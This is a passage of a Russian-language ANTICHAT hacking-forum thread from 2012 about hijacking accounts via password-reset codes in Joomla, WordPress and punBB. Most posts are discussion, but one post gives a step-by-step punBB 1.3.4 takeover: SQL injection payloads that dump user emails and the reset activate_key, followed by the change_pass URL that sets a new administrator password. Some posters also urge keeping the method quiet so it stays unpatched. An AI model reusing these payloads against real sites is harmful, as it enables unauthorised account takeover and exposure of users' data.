ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 08.11.2012, 16:53
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Ааааааа, ну зачем-зачем-зачем ты спалил!!

Цитата:
Сообщение от blesse  
Кстати а как с джумлой обстоят дела?Там же тоже должно катить.
с 1.7 в базе код восстановления хеширован.
 
Ответить с цитированием

  #22  
Старый 08.11.2012, 20:09
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

ну раз с WP раскрылась тема то и до джумлы доберутся)

вообщем в таблице юзеров есть такая колонка "activation" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "521608068f705c84e225b8bc30e387d6:$1$e47b7a03$"

на почту пришел такой хешь "985255f8d4bbe03c95ec3b144fc43da8" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить!

форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confir m
 
Ответить с цитированием

  #23  
Старый 09.11.2012, 02:56
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами: 8469890

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
ну раз с WP раскрылась тема то и до джумлы доберутся)
вообщем в таблице юзеров есть такая колонка "
activation
" вней появляются значение захешированое, в моем примере для теста я зарегался на одном из уязвимых сайтов и востонавил пасс, до востановления там был такой хешь "
521608068f705c84e225b8bc30e387d6:$1$e47b7a03$
"
на почту пришел такой хешь "
985255f8d4bbe03c95ec3b144fc43da8
" т.е это хешь под хешом что приведен выше, и чтобы его получить прийдется его сбрутить!
форма ввода данного кода: /index.php?option=com_user&view=reset&layout=confir m
Так 100 лет можно брутить хэш.
 
Ответить с цитированием

  #24  
Старый 09.11.2012, 08:21
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 16
С нами: 9176038

Репутация: 8
По умолчанию

Короче походу все мои исследования, что я по ретриву проводил пора выкидывать в мусорку... Дальше так и пойдёт....
 
Ответить с цитированием

  #25  
Старый 10.11.2012, 18:31
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами: 10095779

Репутация: 137
По умолчанию

Цитата:
Сообщение от kingbeef  
Так 100 лет можно брутить хэш.
раньше открытые были, потом пофиксели с какойто версии.
 
Ответить с цитированием

  #26  
Старый 20.11.2012, 00:29
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

продолжу тему раз уж нато пошло

форум punBB 1.3.4

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]email[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]forum_users[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR
получаем

Цитата:
Сообщение от None  
2:Администратор:емеил@list.ru
идём на страницу востановления пароля

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//сайт.ру/forum/login.php?action=forget[/COLOR][/COLOR] 
вводим емеил, далее

PHP код:
[COLOR="#000000"][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat_ws[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0x3a[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]activate_key[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]99[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]forum_users[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]limit[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][/COLOR
получам

Цитата:
Сообщение от None  
2:uEH7Wftq
далее меняем пароль

Цитата:
Сообщение от None  
http://сайт.ру/forum/profile.php?action=change_pass&id=
2
&key=
uEH7Wftq
 
Ответить с цитированием

  #27  
Старый 20.11.2012, 10:38
MaxFast
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами: 7676246

Репутация: 94


По умолчанию

Тогда можно переименовать тему, и посвятить ее способам на других CMS.
 
Ответить с цитированием

  #28  
Старый 20.11.2012, 13:10
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 16
С нами: 9176038

Репутация: 8
По умолчанию

Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
 
Ответить с цитированием

  #29  
Старый 21.11.2012, 16:11
Sergeynia
Новичок
Регистрация: 15.08.2012
Сообщений: 0
С нами: 7232726

Репутация: 0
По умолчанию

Да можно создать тему
 
Ответить с цитированием

  #30  
Старый 21.11.2012, 16:57
Prosta4ok
Познающий
Регистрация: 25.10.2012
Сообщений: 61
С нами: 7130486

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
Не торопитесь, ребят, скоро в ветке Уязвимости выложу весь свой труд по этому направлению - там всё и будет...
может не стоит?) захэшируют же все))
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.